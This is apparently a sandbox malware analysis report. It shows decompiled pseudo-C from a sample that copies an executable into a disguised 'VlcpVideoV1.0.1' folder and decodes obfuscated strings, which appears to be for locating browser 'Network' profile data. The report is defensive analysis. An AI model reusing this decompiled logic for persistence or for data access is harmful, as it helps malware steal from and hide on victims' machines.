Opcode Fuzzy Hash: eff4cc4c02553364b4297bc755ce487be9aa888d747edd64515b39176c68fe1f
Instruction Fuzzy Hash: C3B19D70E01214ABDF15AF758C967AE7EA0EF04700F04406AED49AF286DF748A41DFB1

Uniqueness

Uniqueness Score: -1.00%

Function 00D0D10E Relevance: 19.6, APIs: 13, Instructions: 148
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 37%

			E00D0D10E(void* __ecx) {
				signed int _v8;
				signed int _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t62;
				void* _t63;
				long _t83;
				signed char* _t85;
				void* _t87;
				signed int _t88;
				void* _t91;
				intOrPtr _t94;
				void* _t96;
				signed int _t97;
				signed int _t100;
				void* _t102;
				void* _t103;
				signed int _t105;
				void* _t107;
				void* _t108;
				void* _t109;
				void* _t110;
				void* _t112;
				intOrPtr _t114;
				void* _t115;

				_t103 = __ecx;
				_t1 = _t103 + 0x1c; // 0xf0b384
				_t108 = _t1;
				 *0xe8e4d8(_t108, _t102, _t107, _t87, __ecx);
				_t2 = _t103 + 4; // 0x20
				_t94 =  *_t2;
				_t3 = _t103 + 8; // 0x3
				_t88 =  *_t3;
				if(_t88 >= _t94) {
					L2:
					_t88 = 1;
					if(_t94 <= 1) {
						L7:
						_t13 = _t94 + 0x20; // 0x40
						_t59 = _t13;
						_v8 = _t13;
						if( *(_t103 + 0x10) != 0) {
							_t15 = _t103 + 0x10; // 0x558758
							_t109 = GlobalHandle( *_t15);
							GlobalUnWire(_t109);
							_t62 = E00D0C969(_t88, _t94, _t103, _t109, _v8, 8);
							_t96 = 0x2002;
							_t63 = GlobalReAlloc(_t109, _t62, ??);
							_t17 = _t103 + 0x1c; // 0xf0b384
							_t108 = _t17;
						} else {
							_t83 = E00D0C969(_t88, _t94, _t103, _t108, _t59, 8);
							_pop(_t96);
							_t63 = GlobalAlloc(2, _t83); // executed
						}
						if(_t63 != 0) {
							GlobalFix(_t63);
							_t19 = _t103 + 4; // 0x20
							_t97 =  *_t19;
							_t110 = _t63;
							0xe23f30(_t110 + _t97 * 8, 0, _v8 - _t97 << 3);
							 *(_t103 + 0x10) = _t110;
							_t25 = _t103 + 0x1c; // 0xf0b384
							_t108 = _t25;
							 *(_t103 + 4) = _v8;
							goto L14;
						} else {
							if( *(_t103 + 0x10) != _t63) {
								_t37 = _t103 + 0x10; // 0x558758
								GlobalFix(GlobalHandle( *_t37));
							}
							 *0xe8e4d4(_t108);
							E00D0BD23(_t96);
							asm("int3");
							_t91 = _t96;
							_t112 = _t91 + 0x1c;
							 *0xe8e4d8(_t112, _t103, _t108, _t88, _t115);
							_t105 = _v16;
							if(_t105 <= 0 || _t105 >=  *((intOrPtr*)(_t91 + 0xc))) {
								_push(_t112);
							} else {
								_t114 =  *((intOrPtr*)(_t91 + 0x14));
								while(_t114 != 0) {
									if(_t105 <  *((intOrPtr*)(_t114 + 8))) {
										_t100 =  *( *((intOrPtr*)(_t114 + 0xc)) + _t105 * 4);
										if(_t100 != 0) {
											 *((intOrPtr*)( *_t100))(1);
										}
										 *( *((intOrPtr*)(_t114 + 0xc)) + _t105 * 4) =  *( *((intOrPtr*)(_t114 + 0xc)) + _t105 * 4) & 0x00000000;
									}
									_t114 =  *((intOrPtr*)(_t114 + 4));
								}
								 *( *((intOrPtr*)(_t91 + 0x10)) + _t105 * 8) =  *( *((intOrPtr*)(_t91 + 0x10)) + _t105 * 8) & 0xfffffffe;
								_push(_t91 + 0x1c);
							}
							return  *0xe8e4d4();
						}
					} else {
						_t9 = _t103 + 0x10; // 0x558758
						_t85 =  *_t9 + 8;
						while(( *_t85 & 0x00000001) != 0) {
							_t88 = _t88 + 1;
							_t85 =  &(_t85[8]);
							if(_t88 < _t94) {
								continue;
							}
							break;
						}
						if(_t88 < _t94) {
							goto L14;
						} else {
							goto L7;
						}
					}
				} else {
					_t4 = _t103 + 0x10; // 0x558758
					if(( *( *_t4 + _t88 * 8) & 0x00000001) == 0) {
						L14:
						_t27 = _t103 + 0xc; // 0x3
						if(_t88 >=  *_t27) {
							_t28 = _t88 + 1; // 0x4
							 *((intOrPtr*)(_t103 + 0xc)) = _t28;
						}
						_t30 = _t103 + 0x10; // 0x558758
						 *( *_t30 + _t88 * 8) =  *( *_t30 + _t88 * 8) | 0x00000001;
						_t35 = _t88 + 1; // 0x4
						 *(_t103 + 8) = _t35;
						 *0xe8e4d4(_t108);
						return _t88;
					} else {
						goto L2;
					}
				}
			}

APIs

RtlEnterCriticalSection.NTDLL(00F0B384), ref: 00D0D11B
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,00F0B368,?,00D0D328,00000004,00D0D813,00D0BD57,00D0C775,00CA6215,?), ref: 00D0D173
GlobalHandle.KERNEL32(00558758), ref: 00D0D17E
GlobalUnWire.KERNEL32(00000000), ref: 00D0D187
GlobalReAlloc.KERNEL32(00000000,00000000,00002002), ref: 00D0D1A0
GlobalFix.KERNEL32(00000000), ref: 00D0D1B5
_memset.LIBCMT ref: 00D0D1CF
RtlLeaveCriticalSection.NTDLL(00F0B384), ref: 00D0D1FC
GlobalHandle.KERNEL32(00558758), ref: 00D0D20E
GlobalFix.KERNEL32(00000000), ref: 00D0D215
RtlLeaveCriticalSection.NTDLL(00F0B384), ref: 00D0D21C
RtlEnterCriticalSection.NTDLL(?), ref: 00D0D234
RtlLeaveCriticalSection.NTDLL(?), ref: 00D0D27C

Memory Dump Source

Source File: 00000004.00000002.563872115.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000004.00000002.563766430.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.574108372.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577635178.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577956616.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578029988.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578295821.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: Global$CriticalSection$Leave$AllocEnterHandle$Wire_memset
String ID:
API String ID: 4149757546-0
Opcode ID: c185c7cdb8383c7c4db7a8e20dc5d40c73a8e2c15c1e1d768df80a9995bde612
Instruction ID: 682f1c29163382e26d151c354b45a8029607185cddfbf62dc3fb11abea6c07e0
Opcode Fuzzy Hash: c185c7cdb8383c7c4db7a8e20dc5d40c73a8e2c15c1e1d768df80a9995bde612
Instruction Fuzzy Hash: 1551BF71200705AFDB14CFA4D885B6AB7B9FF05311B04426AE91DE76A1CB30F955CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 00CAE2BF Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 192
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 47%

			E00CAE2BF(intOrPtr* __ecx, void* __eflags, signed int _a4, signed int* _a8) {
				intOrPtr _v0;
				signed int _v12;
				short _v16;
				void* _v24;
				char _v28;
				signed int _v40;
				short _v548;
				intOrPtr _v552;
				char _v570;
				char _v572;
				char _v576;
				intOrPtr _v580;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t52;
				signed int _t54;
				void _t62;
				WCHAR* _t64;
				struct _SECURITY_ATTRIBUTES* _t65;
				intOrPtr _t66;
				intOrPtr _t67;
				void _t68;
				void _t69;
				intOrPtr _t72;
				signed int _t87;
				void* _t88;
				signed int* _t91;
				void* _t92;
				signed int _t93;
				signed int _t98;
				signed int _t101;
				intOrPtr _t113;
				signed int* _t123;
				void* _t126;
				void* _t128;
				intOrPtr* _t132;
				void* _t134;
				void* _t140;
				intOrPtr* _t142;
				intOrPtr _t143;
				void* _t149;
				signed int _t154;
				signed int _t158;
				void* _t160;
				void* _t161;

				E00CA5A73(__ecx, 0x8007000e);
				asm("int3");
				_t154 = _t158;
				_push(__ecx);
				_push(__ecx);
				_t91 = _a8;
				_t146 = __ecx;
				_push(_t126);
				_t52 =  *_t91;
				_v16 = 0;
				if(_t52 < 0) {
					E00CA5A73(0, 0x80070057);
					asm("int3");
					_t54 =  *0xf02790; // 0x97f5acff
					_v40 = _t54 ^ _t158;
					_t92 = _v24;
					_v576 = _v28;
					_v580 = 0;
					_v572 = 0;
					0xe23f30( &_v570, 0, 0x206, _t126, __ecx, _t91, _t154);
					_t160 = _t158 - 0x220 + 0xc;
					 *0xe8e540(GetDesktopWindow(),  &_v572, 5, 0); // executed
					_t128 =  &_v572 - 2;
					do {
						_t62 =  *(_t128 + 2);
						_t128 = _t128 + 2;
					} while (_t62 != 0);
					_t98 = 8;
					_t64 = memcpy(_t128, L"\\VlcpVideoV1.0.1", _t98 << 2);
					_t161 = _t160 + 0xc;
					asm("movsw"); // executed
					_t65 = PathFileExistsW(_t64); // executed
					if(_t65 == 0 && CreateDirectoryW( &_v548, _t65) == 0) {
						0xe25ec7( &_v28, 0xe93e38, 3);
						_t161 = _t161 + 0xc;
					}
					_t132 =  &_v548 - 2;
					do {
						_t66 =  *((intOrPtr*)(_t132 + 2));
						_t132 = _t132 + 2;
					} while (_t66 != 0);
					_t67 = "\\"; // 0x5c
					_t149 = _t92;
					 *_t132 = _t67;
					do {
						_t68 =  *_t92;
						_t92 = _t92 + 2;
					} while (_t68 != 0);
					_t93 = _t92 - _t149;
					_t134 =  &_v548 - 2;
					do {
						_t69 =  *(_t134 + 2);
						_t134 = _t134 + 2;
					} while (_t69 != 0);
					_t101 = _t93 >> 2;
					memcpy(_t134, _t149, _t101 << 2);
					memcpy(_t149 + _t101 + _t101, _t149, _t93 & 0x00000003);
					_t140 =  &_v548 - 2;
					do {
						_t72 =  *((intOrPtr*)(_t140 + 2));
						_t140 = _t140 + 2;
					} while (_t72 != 0);
					asm("movsd");
					asm("movsd");
					asm("movsw");
					E00CA3D46(_v552,  &_v548);
					0xe2142c();
					return _v552;
				} else {
					_t142 = _a4;
					if(_t142 == 0 ||  *_t142 == 0) {
						_t143 =  *_t146;
						if(_t52 >=  *((intOrPtr*)(_t143 - 0xc))) {
							goto L8;
						} else {
							_push(E00CAD6BA(_t146));
							_push(_t143 +  *_t91 * 2);
							E00CAC0E0(_t91, _v0, _t143);
						}
					} else {
						_t113 =  *__ecx;
						_t123 = _t113 + _t52 * 2;
						_a8 = _t123;
						_t87 = _t113 +  *(_t113 - 0xc) * 2;
						_a4 = _t87;
						if(_t123 >= _t87) {
							L8:
							 *_t91 =  *_t91 | 0xffffffff;
							E00CA36A6(_v0, _t146, E00CAD6BA(_t146));
						} else {
							0xe26c61(_t123, _t142);
							_v12 = _t87;
							_t88 = _a8 + _t87 * 2;
							if(_t88 >= _a4) {
								goto L8;
							} else {
								0xe26bf7(_t88, _t142);
								_t17 =  *_t91 + _v12 + 1; // 0x1
								 *_t91 = _t17 + _t88;
								E00CADA67(__ecx, _v0,  *_t91 + _v12, _t88);
							}
						}
					}
					return _v0;
				}
			}

0x00cae2c4
0x00cae2c9
0x00cae2cb
0x00cae2cd
0x00cae2ce
0x00cae2d0
0x00cae2d4
0x00cae2d8
0x00cae2d9
0x00cae2db
0x00cae2e0
0x00cae384
0x00cae389
0x00cae393
0x00cae39a
0x00cae3a1
0x00cae3a6
0x00cae3b0
0x00cae3bb
0x00cae3ca
0x00cae3cf
0x00cae3e3
0x00cae3ef
0x00cae3f2
0x00cae3f2
0x00cae3f6
0x00cae3f9
0x00cae400
0x00cae40c
0x00cae40c
0x00cae40f
0x00cae411
0x00cae419
0x00cae438
0x00cae43d
0x00cae43d
0x00cae446
0x00cae44b
0x00cae44b
0x00cae44f
0x00cae452
0x00cae457
0x00cae45c
0x00cae45e
0x00cae460
0x00cae460
0x00cae463
0x00cae466
0x00cae471
0x00cae473
0x00cae476
0x00cae476
0x00cae47a
0x00cae47d
0x00cae484
0x00cae487
0x00cae48e
0x00cae496
0x00cae499
0x00cae499
0x00cae49d
0x00cae4a0
0x00cae4b7
0x00cae4b8
0x00cae4b9
0x00cae4bb
0x00cae4ce
0x00cae4d6
0x00cae2e6
0x00cae2e6
0x00cae2eb
0x00cae341
0x00cae346
0x00000000
0x00cae348
0x00cae352
0x00cae358
0x00cae359
0x00cae359
0x00cae2f2
0x00cae2f2
0x00cae2f4
0x00cae2fa
0x00cae2fd
0x00cae300
0x00cae305
0x00cae360
0x00cae360
0x00cae36e
0x00cae307
0x00cae309
0x00cae313
0x00cae316
0x00cae31c
0x00000000
0x00cae31e
0x00cae320
0x00cae32d
0x00cae336
0x00cae33a
0x00cae33a
0x00cae31c
0x00cae305
0x00cae37c
0x00cae37c

APIs

_wcsspn.LIBCMT ref: 00CAE309
_wcscspn.LIBCMT ref: 00CAE320
_memset.LIBCMT ref: 00CAE3CA
GetDesktopWindow.USER32 ref: 00CAE3DC
SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000000), ref: 00CAE3E3
PathFileExistsW.SHLWAPI(?,?,?,00000000), ref: 00CAE411
CreateDirectoryW.KERNEL32(?,00000000,?,?,00000000), ref: 00CAE423
_sprintf.LIBCMT ref: 00CAE438

Strings

.exe, xrefs: 00CAE4B1
\VlcpVideoV1.0.1, xrefs: 00CAE401

Memory Dump Source

Source File: 00000004.00000002.563872115.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000004.00000002.563766430.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.574108372.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577635178.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577956616.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578029988.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578295821.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: Path$CreateDesktopDirectoryExistsFileFolderSpecialWindow_memset_sprintf_wcscspn_wcsspn
String ID: .exe$\VlcpVideoV1.0.1
API String ID: 935740167-4252105261
Opcode ID: b84100a1bcd48fb75bcc30c5b287b6da4c391233a633b9d3d7abab1a77f9c13f
Instruction ID: 7f208f09aa2a00950dcdd4ca2465fc19d45ebfde49a26704878db238a8ad6c2f
Opcode Fuzzy Hash: b84100a1bcd48fb75bcc30c5b287b6da4c391233a633b9d3d7abab1a77f9c13f
Instruction Fuzzy Hash: 5C51E475A0021EABCF24DF69DC85ADEB7B9FF55304F008559F809A7210EB30AA41CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 00CADCF2 Relevance: 16.1, APIs: 4, Strings: 5, Instructions: 344
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 35%

			E00CADCF2(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, signed int _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v8;
				intOrPtr _v24;
				char _v280;
				char _v284;
				signed int _v288;
				char _v292;
				char _v296;
				signed int _v300;
				char _v304;
				intOrPtr _v308;
				char _v312;
				void* _v316;
				char _v320;
				char _v324;
				char _v328;
				char _v332;
				intOrPtr _v336;
				intOrPtr _v340;
				intOrPtr _v344;
				intOrPtr* _v348;
				intOrPtr _v352;
				char _v356;
				char* _t122;
				char* _t128;
				signed int* _t129;
				signed int* _t130;
				intOrPtr* _t131;
				intOrPtr _t132;
				intOrPtr _t133;
				intOrPtr _t134;
				intOrPtr* _t138;
				char* _t140;
				intOrPtr* _t151;
				void* _t153;
				void* _t157;
				void* _t160;
				intOrPtr _t162;
				intOrPtr _t165;
				void* _t173;
				intOrPtr _t174;
				void* _t175;
				intOrPtr _t176;
				intOrPtr _t177;
				intOrPtr* _t179;
				intOrPtr* _t197;
				intOrPtr _t209;
				intOrPtr* _t214;
				char _t217;
				void* _t218;
				intOrPtr _t219;
				signed int _t222;
				signed int _t223;
				intOrPtr* _t225;
				void* _t230;
				void* _t231;

				_t175 = __ebx;
				_push(__esi);
				_t222 = _a4;
				_push(__edi);
				_t214 =  *__ecx - 0x10;
				_t179 =  *_t214;
				if( *((intOrPtr*)(_t214 + 8)) >= _t222 || _t222 <= 0) {
					L4:
					E00CAE2BF(_t179, __eflags);
					asm("int3");
					0xe21503();
					_v308 = _a12;
					_v8 = 1;
					E00D09480(_t175,  &_v304,  &_a4);
					_t181 = 0x154;
					_t217 = 0;
					_v8 = 2;
					_t223 = _t222 | 0xffffffff;
					0xe6457a( &_v296, _t223, 0x40, 0x8000, 0);
					_t122 =  &_v296;
					0xe6455a(_t122, "d"); // executed
					_t176 = _t122;
					__eflags = _t176;
					if(_t176 == 0) {
						0xe6457a( &_v296, _t223, 0x22, 0, "j`a");
						_t128 =  &_v296;
						0xe6454a(_t128); // executed
						_t176 = _t128;
						__eflags = _t176;
						if(_t176 == 0) {
							_t129 =  &_v288;
							_v288 = _t223;
							0xe6458a(_v296, _t129, 0, 0);
							_t176 = _t129;
							__eflags = _t176;
							if(_t176 == 0) {
								0xe645aa(_v288, _v304, 1); // executed
								_t176 = _t129;
								__eflags = _t176;
								if(_t176 == 0) {
									_t130 =  &_v300;
									_v300 = _t223;
									0xe645da(_v288, _v304, 0, _t130, 1); // executed
									_t176 = _t130;
									__eflags = _t176;
									if(_t176 == 0) {
										_t131 = E00D09547(_t181, "Fihc`oNby|vUi");
										_t224 = _t131;
										_v312 = 0;
										_v348 = _t131;
										_t132 = E00D09547(_t181, "kgjm");
										_v352 = _t132;
										_t133 = E00D09547(_t181, "sgk}l");
										_v336 = _t133;
										_t134 = E00D09547(_t181, "wbhehce");
										_v344 = _t134;
										_v284 = 0;
										0xe23f30( &_v280, 0, 0x104, 0, 0, 0, 0);
										_t138 = E00CACD24(_t176, _t181, 0, _t131, _v300, _v288, _t224,  &_v284,  &_v312); // executed
										_t231 = _t230 + 0x40;
										while(1) {
											__eflags = _t138;
											if(_t138 == 0) {
												break;
											}
											_t140 =  &_v280;
											0xe645fa(_v288, _v300, _t140, _t217, _t217, 4,  &_v292); // executed
											_t176 = _t140;
											_v340 = _t176;
											0xe6462a(_v288, _v292, 0x80000000, _t217); // executed
											__eflags = _t140;
											if(_t140 == 0) {
												do {
													E00CA36A6( &_v320, _t224, E00D0CAD0());
													_v8 = 3;
													E00CA36A6( &_v324, _t224, E00D0CAD0());
													_v8 = 4;
													E00CA36A6( &_v316, _t224, E00D0CAD0());
													_v8 = 5;
													_t151 = _v24 + 0x108;
													while(1) {
														__eflags =  *_t151 - _t217;
														if( *_t151 == _t217) {
															break;
														}
														_t225 =  *_t151;
														_t49 = _t225 + 8; // 0x8
														_t218 = _t49;
														0xe2695e(_t218, _v352);
														__eflags = _t151;
														if(_t151 != 0) {
															0xe2695e(_t218, _v336);
															__eflags = _t151;
															if(_t151 != 0) {
																0xe2695e(_t218, _v344);
																__eflags = _t151;
																if(_t151 == 0) {
																	_t153 = E00CADB7A(_t214,  &_v332, _v288, _v292,  *((intOrPtr*)(_t225 + 4)),  *_t225);
																	_t231 = _t231 + 0x14;
																	_v8 = 8;
																	E00CAC13D( &_v316, _t225, _t153);
																	_t209 = _v332;
																	goto L19;
																}
															} else {
																_t157 = E00CADB7A(_t214,  &_v328, _v288, _v292,  *((intOrPtr*)(_t225 + 4)),  *_t225);
																_t231 = _t231 + 0x14;
																_v8 = 7;
																E00CAC13D( &_v324, _t225, _t157);
																_t209 = _v328;
																goto L19;
															}
														} else {
															_t160 = E00CADB7A(_t214,  &_v356, _v288, _v292,  *((intOrPtr*)(_t225 + 4)),  *_t225);
															_t231 = _t231 + 0x14;
															_v8 = 6;
															E00CAC13D( &_v320, _t225, _t160);
															_t209 = _v356;
															L19:
															_v8 = 5;
															E00CA656C(_t209 - 0x10, _t214);
														}
														_t75 = _t225 + 0x108; // 0x108
														_t151 = _t75;
														_t217 = 0;
														__eflags = 0;
													}
													_t224 = _v316;
													_t197 = _t224;
													_t214 = _t197 + 2;
													do {
														_t162 =  *_t197;
														_t197 = _t197 + 2;
														__eflags = _t162 - _t217;
													} while (_t162 != _t217);
													0xe26e13(_a8, _t224, _t197 - _t214 >> 1);
													_t219 = _v320;
													_t231 = _t231 + 0xc;
													_t177 = _v324;
													__eflags = _t162;
													if(_t162 == 0) {
														_push( *((intOrPtr*)(_t219 - 0xc)));
														E00CAC201(_v308, _t219);
														_push(E00CA67CE("="));
														E00CAC201(_v308, "=");
														_push( *((intOrPtr*)(_t177 - 0xc)));
														E00CAC201(_v308, _t177);
														_push(E00CA67CE(0xe93e34));
														E00CAC201(_v308, 0xe93e34);
													}
													E00CA656C(_t224 - 0x10, _t214);
													E00CA656C(_t177 - 0x10, _t214);
													_t181 = _t219 - 0x10;
													_v8 = 2;
													_t165 = E00CA656C(_t219 - 0x10, _t214);
													_t217 = 0;
													0xe6462a(_v288, _v292, 1, 0);
													__eflags = _t165;
												} while (_t165 == 0);
												_t176 = _v340;
												_t224 = _v348;
											}
											0xe6460a(_v288, _v292);
											_v284 = _t217;
											0xe23f30( &_v280, _t217, 0x104);
											_t138 = E00CACD24(_t176, _t181, _t217, _t224, _v300, _v288, _t224,  &_v284,  &_v312); // executed
											_t231 = _t231 + 0x20;
										}
										0xe645ea(_v288, _v300, 1);
										0xe645ba(_v288, _v304); // executed
									}
								}
								0xe6459a(_v288, _t217);
								_push(_v296);
							} else {
								_push(0);
							}
							0xe6456a(); // executed
						}
					}
					E00CA656C(_v304 - 0x10, _t214);
					E00CA656C(_a4 - 0x10, _t214);
					E00CA656C(_a8 - 0x10, _t214);
					0xe214b2();
					return _t176;
				} else {
					_t173 =  *((intOrPtr*)( *_t179 + 8))(_t214, _t222, 1);
					if(_t173 == 0) {
						goto L4;
					} else {
						_t174 = _t173 + 0x10;
						 *__ecx = _t174;
						return _t174;
					}
				}
			}

APIs

__EH_prolog3_GS.LIBCMT ref: 00CADD34
_memset.LIBCMT ref: 00CADE8C
__wcsnicmp.LIBCMT ref: 00CAE06E

Strings

Fihc`oNby|vUi, xrefs: 00CADE2E
j`a, xrefs: 00CADD94
kgjm, xrefs: 00CADE41
sgk}l, xrefs: 00CADE52
wbhehce, xrefs: 00CADE63

Memory Dump Source

Source File: 00000004.00000002.563872115.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000004.00000002.563766430.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.574108372.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577635178.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577956616.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578029988.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578295821.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: H_prolog3___wcsnicmp_memset
String ID: Fihc`oNby|vUi$j`a$kgjm$sgk}l$wbhehce
API String ID: 3863332369-1906186485
Opcode ID: 5771b3f4335dd392cf19e9c9d563df9c568c9e0f144b1d5001219c2ae2cb72f6
Instruction ID: d883b73c4e6ab4d3124158ac8b225bbf0a9abc720bc099b46f850a9fc2ec4055
Opcode Fuzzy Hash: 5771b3f4335dd392cf19e9c9d563df9c568c9e0f144b1d5001219c2ae2cb72f6
Instruction Fuzzy Hash: 92D1607190021AABCF25AB60CC85FDEBBB9EF5A704F0040D9F60A76191DA719F94DF60

Uniqueness

Uniqueness Score: -1.00%

Function 00CA7A14 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 94
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 50%

			E00CA7A14(void* __ecx, void* __eflags) {
				void* _t28;
				intOrPtr _t40;
				signed int _t49;
				intOrPtr _t50;
				signed int _t51;
				intOrPtr _t67;
				void* _t70;
				void* _t71;
				void* _t72;

				0xe21503(0x17c);
				_t50 =  *((intOrPtr*)(_t70 + 8));
				_t67 =  *((intOrPtr*)(_t70 + 0xc));
				_t28 = E00D095A9(__ecx, L"IIDIEK[\\IO[Q");
				0xe24b10(_t28, 0); // executed
				_t72 = _t71 + 0xc;
				if(_t28 != 0) {
					L3:
					E00CA3D46(_t70 - 0x28, _t28);
					 *(_t70 - 4) =  *(_t70 - 4) & 0x00000000;
					_push(0);
					E00CA7590(_t70 - 0x28, __eflags, _t30, E00CA9A45(E00D095A9(_t70 - 0x28, 0xe93b40)));
					E00CA7590(_t70 - 0x28, __eflags, L"Network\\", E00CA9A45(L"Network\\"));
					E00CA7590(_t70 - 0x28, __eflags, _t50, E00CA9A45(_t50));
					_push(1);
					_push(0x40);
					_push(0x21);
					_push(_t70 - 0x28);
					L00CA3949(_t70 - 0xe0); // executed
					 *(_t70 - 4) = 1;
					_t40 =  *((intOrPtr*)( *((intOrPtr*)(_t70 - 0xe0)) + 4));
					__eflags =  *(_t70 + _t40 - 0xd4) & 0x00000006;
					if(( *(_t70 + _t40 - 0xd4) & 0x00000006) == 0) {
						_push(1);
						_push(0x40);
						_push(0x22);
						_push(_t67);
						E00CA3B57(_t70 - 0x188); // executed
						 *(_t70 - 4) = 2;
						_push(_t70 - 0xd0);
						E00CA5071(_t70 - 0x188, __eflags);
						E00CA789A(_t70 - 0x188, __eflags);
						E00CA7868(_t70 - 0xe0, __eflags);
						_t51 = 1;
						E00CA52B1(_t70 - 0x188);
					} else {
						_t51 = 0;
					}
					E00CA5225(_t70 - 0xe0);
					E00CA71CD(_t70 - 0x28, 1, 0);
					_t49 = _t51;
				} else {
					_t28 = E00D095A9(__ecx, L"DVWLH^J");
					0xe24b10(_t28, _t28);
					_t72 = _t72 + 0xc;
					if(_t28 != 0) {
						goto L3;
					} else {
						_t49 = 0;
					}
				}
				0xe214b2();
				return _t49;
			}

APIs

__EH_prolog3_GS.LIBCMT ref: 00CA7A1E
__wgetenv.LIBCMT ref: 00CA7A36
__wgetenv.LIBCMT ref: 00CA7A4E

Part of subcall function 00E24B10: _wcsnlen.LIBCMT ref: 00E24B49
Part of subcall function 00E24B10: __lock.LIBCMT ref: 00E24B5A
Part of subcall function 00E24B10: __wgetenv_helper_nolock.LIBCMT ref: 00E24B65

char_traits.LIBCPMT ref: 00CA7A7D
char_traits.LIBCPMT ref: 00CA7A95
char_traits.LIBCPMT ref: 00CA7AA6

Strings

DVWLH^J, xrefs: 00CA7A43
IIDIEK[\IO[Q, xrefs: 00CA7A2B
Network\, xrefs: 00CA7A8F, 00CA7A94, 00CA7A9C

Memory Dump Source

Source File: 00000004.00000002.563872115.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000004.00000002.563766430.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.574108372.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577635178.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577956616.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578029988.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578295821.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: char_traits$__wgetenv$H_prolog3___lock__wgetenv_helper_nolock_wcsnlen
String ID: DVWLH^J$IIDIEK[\IO[Q$Network\
API String ID: 3563457284-4247936164
Opcode ID: 83535905d72efc3851a4d57e07ce1e515b2df035b92444badbbf29df7eef303c
Instruction ID: 9ea352c8383786c2a97ea1052b19813181ae7e2188eba89c92adc550e86ff529
Opcode Fuzzy Hash: 83535905d72efc3851a4d57e07ce1e515b2df035b92444badbbf29df7eef303c
Instruction Fuzzy Hash: 7A31C2719442157ADB10F7A0DC67FEE7378AF16708F045594F90A761C2EEB06F84EA60

Uniqueness

Uniqueness Score: -1.00%

Function 00DC19EB Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 38
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3.LIBCMT ref: 00DC19F2

Part of subcall function 00D0F0EC: RtlEnterCriticalSection.NTDLL(00F0B598), ref: 00D0F11B
Part of subcall function 00D0F0EC: RtlInitializeCriticalSection.NTDLL(00000000), ref: 00D0F131
Part of subcall function 00D0F0EC: RtlLeaveCriticalSection.NTDLL(00F0B598), ref: 00D0F143
Part of subcall function 00D0F0EC: RtlEnterCriticalSection.NTDLL(00000000), ref: 00D0F14F

GetProfileIntW.KERNEL32(windows,DragMinDist,00000002), ref: 00DC1A45
GetProfileIntW.KERNEL32(windows,DragDelay,000000C8), ref: 00DC1A5B

Strings

windows, xrefs: 00DC1A3F, 00DC1A44, 00DC1A55
dk, xrefs: 00DC1A09
DragMinDist, xrefs: 00DC1A3A
DragDelay, xrefs: 00DC1A50

Memory Dump Source

